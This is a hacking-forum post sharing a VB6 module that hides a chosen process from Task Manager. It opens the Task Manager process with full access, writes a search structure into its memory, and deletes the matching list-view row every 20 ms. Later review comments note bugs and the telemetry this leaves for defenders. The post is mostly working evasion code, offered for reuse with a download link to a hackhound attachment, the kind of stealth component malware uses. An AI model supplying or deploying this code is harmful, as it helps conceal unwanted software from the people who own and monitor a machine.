Nytro

[VB6] HideProcess without Driver


[VB6] HideProcess without Driver

Author:

f0rce

Credits:

Mrfrog

SqUeEzEr

Attribute VB_Name = "mHideProcess"
'---------------------------------------------------------------------------------------
' Module : mHideProcess '
' Author : f0rce '
' Credits : Very Big Thanks to SqUeEzEr & Mrfrog '
' Mail : f0rce@hotmail.de '
' Published : 17/03/2011 '
' Purpose : Hide a Process without Driver or other things '
' Compile in P-Code then it works '
' '
' License : You can use this code in your own applications, share the source... '
' Don't forget to leave credits or assume you're an asshole. '
'---------------------------------------------------------------------------------------

Option Explicit
Option Base 0

'// @kernel32.dll
' Cross-process memory primitives. HideProcess (below) uses them to open the
' Task Manager process, commit a buffer inside it and copy an LVFINDINFO plus
' the target name there, so that a pointer inside the struct is valid in the
' receiving process. From the defender's side this is the loudest part of the
' module: a foreign process opening taskmgr with full access and writing into it.
Private Declare Function CloseHandle Lib "Kernel32.dll" (ByVal hObject As Long) As Long
' dwDesiredAccessas: misspelt parameter name, harmless in a Declare.
Private Declare Function OpenProcess Lib "Kernel32.dll" (ByVal dwDesiredAccessas As Long, ByVal bInheritHandle As Long, ByVal dwProcId As Long) As Long
' NOTE(review): lpAddress is declared ByRef As Any here but ByVal Long for
' VirtualAllocEx below; callers must pass the remote address with an explicit
' ByVal or the address of the local variable is sent instead (see HideProcess).
Private Declare Function VirtualFreeEx Lib "Kernel32.dll" (ByVal hProcess As Long, lpAddress As Any, ByVal dwSize As Long, ByVal dwFreeType As Long) As Long
Private Declare Function VirtualAllocEx Lib "Kernel32.dll" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Private Declare Function WriteProcessMemory Lib "Kernel32.dll" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
' NOTE(review): GetLastError returns a DWORD, so an Integer return truncates it,
' and the VB6 runtime commonly overwrites the thread's last error before user
' code can read it (Err.LastDllError is the usual alternative). Not referenced
' anywhere in this module.
Public Declare Function GetLastError Lib "kernel32" () As Integer

'// @user32.dll
' Window plumbing: a periodic timer (SetTimer/KillTimer), lookup of the dialog
' and its list-view (FindWindowA/EnumChildWindows/GetClassNameA), list-view
' messages (SendMessageA), subclassing of the caller's window
' (SetWindowLongA/CallWindowProcA) and shell-hook notifications
' (RegisterWindowMessageW/RegisterShellHookWindow/DeregisterShellHookWindow).
Private Declare Function SetTimer Lib "user32.dll" (ByVal Hwnd As Long, ByVal nIDEvent As Long, ByVal uElapse As Long, ByVal lpTimerFunc As Long) As Long
Private Declare Function KillTimer Lib "user32.dll" (ByVal Hwnd As Long, ByVal nIDEvent As Long) As Long
Private Declare Function FindWindowA Lib "user32.dll" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Private Declare Function SendMessageA Lib "user32.dll" (ByVal Hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
Private Declare Function GetClassNameA Lib "user32.dll" (ByVal Hwnd As Long, ByVal lpClassName As String, ByVal nMaxCount As Long) As Long
Private Declare Function SetWindowLongA Lib "user32.dll" (ByVal Hwnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
Private Declare Function CallWindowProcA Lib "user32.dll" (ByVal lpPrevWndFunc As Long, ByVal Hwnd As Long, ByVal msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Private Declare Function EnumChildWindows Lib "user32.dll" (ByVal hWndParent As Long, ByVal lpEnumFunc As Long, ByVal lParam As Long) As Long
' Wide variant: called with StrPtr() of a VB string, see StartHideProcessHook.
Private Declare Function RegisterWindowMessageW Lib "user32.dll" (ByVal lpString As Long) As Long
Private Declare Function RegisterShellHookWindow Lib "user32.dll" (ByVal Hwnd As Long) As Long
Private Declare Function GetWindowThreadProcessId Lib "user32.dll" (ByVal Hwnd As Long, lpdwProcessId As Long) As Long
Private Declare Function DeregisterShellHookWindow Lib "user32.dll" (ByVal Hwnd As Long) As Long

'// Types
' Win32 POINT (two 32-bit coordinates). Only present because LVFINDINFO embeds
' it; this module never assigns it.
Private Type POINTAPI
    x As Long
    y As Long
End Type

' VB layout of the Win32 LVFINDINFO structure passed with LVM_FINDITEM.
' Seven Longs, so Len() and LenB() both give 28 for it.
' HideProcess fills only flags and psz; psz is a pointer that must be valid in
' the address space of the process that owns the list-view, which is why the
' whole struct and the string it points to are copied into that process first.
Private Type LVFINDINFO
    flags As Long       ' LVFI_* search flags
    psz As Long         ' pointer to the NUL-terminated text to look for
    lParam As Long      ' not used here
    pt As POINTAPI      ' not used here
    vkDirection As Long ' not used here
End Type


'// Consts
' Class name of the common-controls list-view the process rows live in.
Private Const LISTVIEW_CLASSNAME$ = "SysListView32"
' NOTE(review): "#32770" is the window class every Windows dialog box uses, not
' something unique to Task Manager. FindWindowA/the shell hook therefore match
' any top-level dialog; the list-view search in SearchListView then decides
' whether anything happens.
Private Const TASKMANAGER_CLASSNAME$ = "#32770"

' VirtualAllocEx/VirtualFreeEx flags. MEM_COMMIT is declared here but HideProcess
' passes the literal &H1000 instead.
Private Const MEM_COMMIT& = &H1000
Private Const MEM_RESERVE& = &H2000
Private Const MEM_RELEASE& = &H8000&

' SetWindowLong index (-4) for replacing a window procedure (subclassing).
Private Const GWL_WNDPROC& = -&H4&

' Declared but unused: HideProcess commits its remote buffer with &H40
' (PAGE_EXECUTE_READWRITE), not this value.
Private Const PAGE_READWRITE& = &H4&

' List-view find/delete messages. LVM_FINDITEM is the ANSI form (LVM_FIRST+13),
' consistent with the ANSI byte copy of the name kept in bytProcess2Hide.
' LVM_DELETEITEM is declared but HideProcess uses the literal &H1000 + 8.
Private Const LVFI_WRAP& = &H20
Private Const LVM_FIRST = &H1000
Private Const LVM_FINDITEM = (LVM_FIRST + 13)
Private Const LVM_DELETEITEM& = &H1008

' Minimal process-access rights; declared but unused, HideProcess requests
' &H1F0FFF (the pre-Vista PROCESS_ALL_ACCESS value) instead.
Private Const PROCESS_VM_READ& = &H10
Private Const PROCESS_VM_WRITE& = &H20
Private Const PROCESS_VM_OPERATION& = &H8

' wParam codes delivered with the SHELLHOOK window message.
Private Const HSHELL_WINDOWCREATED& = &H1
Private Const HSHELL_WINDOWDESTROYED& = &H2

' Declared but unused in this module.
Private Const LVM_GETITEMTEXT = (&H1000 + 45)

'// Variables
Private lngLVHWND&          ' handle of the list-view found inside the dialog, 0 until found
Private lngWinHook&         ' original window procedure of lngReferenceHwnd; 0 = not hooked
Private lngReferenceHwnd&   ' caller's window: subclassed, shell-hook target and timer owner
Private WM_SHELLHOOKMESSAGE& ' message id returned by RegisterWindowMessageW("SHELLHOOK")
' ANSI byte copy of the row text to remove (module-level Dim is Private).
Dim bytProcess2Hide() As Byte

' Installs the hook: subclasses lngRefHwnd, registers it for shell-hook
' notifications so that newly created dialogs are noticed, and — if a dialog is
' already open — starts looking for its list-view right away.
'   lngRefHwnd     : handle of a window owned by the caller; it receives the
'                    SHELLHOOK message and the 20 ms timer (see SearchListView).
'   strProcessName : row text to remove from the list-view; ByRef but never
'                    written to.
' Does nothing when the arguments are empty or when a hook is already installed
' (lngWinHook <> 0). Debug.Print/Time$ only have an effect inside the IDE.
' What this sets up is cosmetic: the target is a row in a UI control; the
' process itself remains visible to every other enumeration. The subclass
' (SetWindowLong GWL_WNDPROC) and RegisterShellHookWindow call on a window of
' this process are themselves observable.
Public Sub StartHideProcessHook(ByVal lngRefHwnd&, ByRef strProcessName$)
    Dim lngTskMngrHwnd&

    ' NOTE(review): And is bitwise here, with the comparison yielding True (-1)
    ' or False (0); the result is lngRefHwnd or 0, which happens to match the
    ' intended "both non-zero" test.
    If lngRefHwnd And LenB(strProcessName) > 0 Then
        If lngWinHook = 0 Then
            Debug.Print "Hook Started -> "; Time$

            ' ANSI bytes, to pair with the ANSI LVM_FINDITEM message.
            bytProcess2Hide = StrConv(strProcessName, vbFromUnicode)
            lngReferenceHwnd = lngRefHwnd

            ' "#32770" is the generic dialog class, so this is the first
            ' top-level dialog found, not necessarily Task Manager.
            lngTskMngrHwnd = FindWindowA(TASKMANAGER_CLASSNAME, vbNullString)
            If lngTskMngrHwnd Then
                StartFindLV lngTskMngrHwnd
            End If

            ' Message id shared with the shell; WinProc compares uMsg against it.
            WM_SHELLHOOKMESSAGE = RegisterWindowMessageW(StrPtr("SHELLHOOK"))
            ' Returns the previous procedure, kept for forwarding and restore.
            ' AddressOf on a module function is why the header asks for P-code.
            lngWinHook = SetWindowLongA(lngReferenceHwnd, GWL_WNDPROC, AddressOf WinProc)
            RegisterShellHookWindow lngReferenceHwnd
        End If
    End If
End Sub

' Reverses StartHideProcessHook: puts the original window procedure back,
' deregisters the shell hook, kills the timer and clears lngWinHook so the
' hook can be installed again. No-op unless a hook is currently installed.
' lngLVHWND and lngReferenceHwnd are left as they were; presumably harmless
' because every entry point checks lngWinHook or the timer first — confirm.
Public Sub StopHideProcessHook()
    If lngReferenceHwnd Then
        If lngWinHook Then
            Debug.Print "Hook Stoped -> "; Time$

            SetWindowLongA lngReferenceHwnd, GWL_WNDPROC, lngWinHook
            DeregisterShellHookWindow lngReferenceHwnd

            StopTimer
            lngWinHook = 0
        End If
    End If
End Sub

' Replacement window procedure installed on lngReferenceHwnd.
' Only the SHELLHOOK message is handled; every message is then forwarded to
' the original procedure saved in lngWinHook, whose result is returned.
'   Hwnd, uMsg, wParam, lParam : standard WNDPROC arguments. For
'   WM_SHELLHOOKMESSAGE, wParam is the HSHELL_* code and lParam the handle of
'   the window the notification is about.
' Because TASKMANAGER_CLASSNAME is the generic "#32770" dialog class, the
' created/destroyed branches fire for any dialog, not only Task Manager.
Private Function WinProc(ByVal Hwnd&, ByVal uMsg&, ByVal wParam&, ByVal lParam&) As Long
    If uMsg = WM_SHELLHOOKMESSAGE Then
        Select Case wParam
            Case HSHELL_WINDOWCREATED
                Debug.Print "New Window -> Classname: "; GetWinClassName(lParam), " -> "; Time$

                ' A new dialog: look for a list-view inside it (starts the timer).
                If GetWinClassName(lParam) = TASKMANAGER_CLASSNAME Then
                    StartFindLV lParam

                    'Debug.Print "TaskManager Open -> "; Time$
                End If
            Case HSHELL_WINDOWDESTROYED
                'Debug.Print "Window Closed -> Classname: "; GetWinClassName(lParam), " -> "; Time$

                ' Any dialog closing stops the timer, whichever dialog owned
                ' the list-view; lngLVHWND is not reset here.
                If GetWinClassName(lParam) = TASKMANAGER_CLASSNAME Then
                    '// SetTimer = False
                    StopTimer
                    'Debug.Print "TaskManager Closed -> "; Time$
                End If
        End Select
    End If

    ' Always chain to the original procedure so the window keeps working.
    WinProc = CallWindowProcA(lngWinHook, Hwnd, uMsg, wParam, lParam)
End Function

' TIMERPROC callback registered by SearchListView; runs HideProcess on every
' tick (every 20 ms). NOTE(review): the Win32 TIMERPROC contract delivers
' (hwnd, WM_TIMER, timer id, tick count); the parameter names here were copied
' from SetTimer's own signature and do not describe what arrives. Arguments
' are not used.
Private Sub TimerProc(ByVal lngHwnd&, ByVal nIDEvent&, ByVal uElapse&, ByVal lpTimerFunc&)
    HideProcess
End Sub

' Walks the child windows of lngHwnd (a dialog) through SearchListView,
' which records the first SysListView32 and starts the timer. The lParam of 1
' is passed through to the callback but not used there.
Private Sub StartFindLV(ByVal lngHwnd&)
    EnumChildWindows lngHwnd, AddressOf SearchListView, 1
End Sub

' EnumChildWindows callback. Returns True to continue enumerating and leaves
' the default False — stopping the walk — once a SysListView32 is found; that
' handle is stored in lngLVHWND and a 20 ms timer (id 0) is started on the
' caller's window so that HideProcess runs continuously while the dialog is up.
'   lngHwnd : child window being visited
'   lParam  : value given to EnumChildWindows (1), unused
' NOTE(review): the enumeration callback is expected to return a 32-bit BOOL
' while a VB6 Boolean is 16-bit — confirm this is reliable under the intended
' build settings. A 20 ms polling loop sending list-view messages to another
' process is itself a fairly distinctive behavioural signature.
Private Function SearchListView(ByVal lngHwnd&, ByVal lParam&) As Boolean

    If GetWinClassName(lngHwnd) = LISTVIEW_CLASSNAME Then
        Debug.Print "LV finded -> "; Time$

        lngLVHWND = lngHwnd

        '// SetTimer = True
        SetTimer lngReferenceHwnd, 0, 20, AddressOf TimerProc
    Else
        SearchListView = True
    End If
End Function

' Returns the window-class name of lngHwnd as a VB string (at most 256
' characters). Yields an empty string when GetClassNameA reports a length of 0
' (for example an invalid handle).
Private Function GetWinClassName(ByVal lngHwnd&) As String
    Dim strBuffer As String
    Dim lngCopied As Long

    ' Pre-size a NUL-filled buffer for the API to write into, then keep only
    ' the characters it reports having copied.
    strBuffer = String$(&H100, vbNullChar)
    lngCopied = GetClassNameA(lngHwnd, strBuffer, &H100)
    GetWinClassName = Left$(strBuffer, lngCopied)
End Function

' Stops the timer (id 0) that SearchListView started on the caller's window,
' ending the HideProcess polling.
Private Sub StopTimer()
    KillTimer lngReferenceHwnd, 0
End Sub

' Deletes the list-view row whose text equals bytProcess2Hide. Called every
' 20 ms from TimerProc while lngLVHWND is set.
' This only edits a UI control: the process keeps existing and stays visible
' to every other enumeration (other tools, APIs, logs). What it costs, from the
' list-view owner's point of view, is a full-access OpenProcess, a committed
' executable+writable page, two WriteProcessMemory calls and list-view messages
' from a foreign process — the kind of cross-process access that endpoint
' telemetry (e.g. Sysmon event 10, ProcessAccess) records. Running the dialog's
' owner at a higher integrity level than this caller would presumably make the
' OpenProcess below fail, after which every following call is a silent no-op.
' No return value of any API call is checked.
Private Sub HideProcess()
    Dim pHandle As Long, ProcessID As Long
    Dim pStrBufferMemory As Long, pMyItemMemory As Long ' pStrBufferMemory is unused
    Dim LFI As LVFINDINFO, lWritten As Long
    Dim a As Long

    If lngLVHWND = 0 Then Exit Sub

    ' PID of the process that owns the list-view.
    GetWindowThreadProcessId lngLVHWND, ProcessID

    ' &H1F0FFF = PROCESS_ALL_ACCESS (pre-Vista value); False = no inheritance.
    ' pHandle is not checked for 0.
    pHandle = OpenProcess(&H1F0FFF, False, ProcessID)

    ' Room for the struct plus up to 513 bytes of name, committed (&H1000) as
    ' PAGE_EXECUTE_READWRITE (&H40) although nothing here executes from it.
    ' A fresh commit is zero-filled, which is what terminates the copied name;
    ' the name length is never checked against the 513 bytes.
    pMyItemMemory = VirtualAllocEx(pHandle, 0&, LenB(LFI) + 513, &H1000, &H40)

    ' psz points just past the struct *in the remote process*.
    LFI.flags = LVFI_WRAP
    LFI.psz = pMyItemMemory + Len(LFI)

    ' Struct first, then the ANSI name right behind it. The two calls pass the
    ' bytes-written argument differently (ByVal VarPtr vs. ByRef); both reach
    ' the API as the same pointer.
    Call WriteProcessMemory(pHandle, ByVal pMyItemMemory, ByVal VarPtr(LFI), Len(LFI), ByVal VarPtr(lWritten))
    Call WriteProcessMemory(pHandle, ByVal (pMyItemMemory + Len(LFI)), ByVal VarPtr(bytProcess2Hide(0)), UBound(bytProcess2Hide) + 1, lWritten)
    ' wParam -1: search from the start. Returns the row index or -1.
    a = SendMessageA(lngLVHWND, LVM_FINDITEM, -1, ByVal pMyItemMemory)

    ' &H1000 + 8 is LVM_DELETEITEM (the module's own constant is not used).
    If a > -1 Then SendMessageA lngLVHWND, &H1000 + 8, a, 0&

    ' NOTE(review): VirtualFreeEx is declared with lpAddress ByRef As Any, so
    ' this passes the address of the local pMyItemMemory rather than the remote
    ' base; the release presumably does not take effect, and the owner process
    ' keeps every per-tick allocation — a growing working set is one visible
    ' artefact while this runs.
    VirtualFreeEx pHandle, pMyItemMemory, 0&, MEM_RELEASE
    CloseHandle pHandle
End Sub

Userland hooking.

Download:

http://www.hackhound.org/forum/index.php?app=core&module=attach&section=attach&attach_id=11183
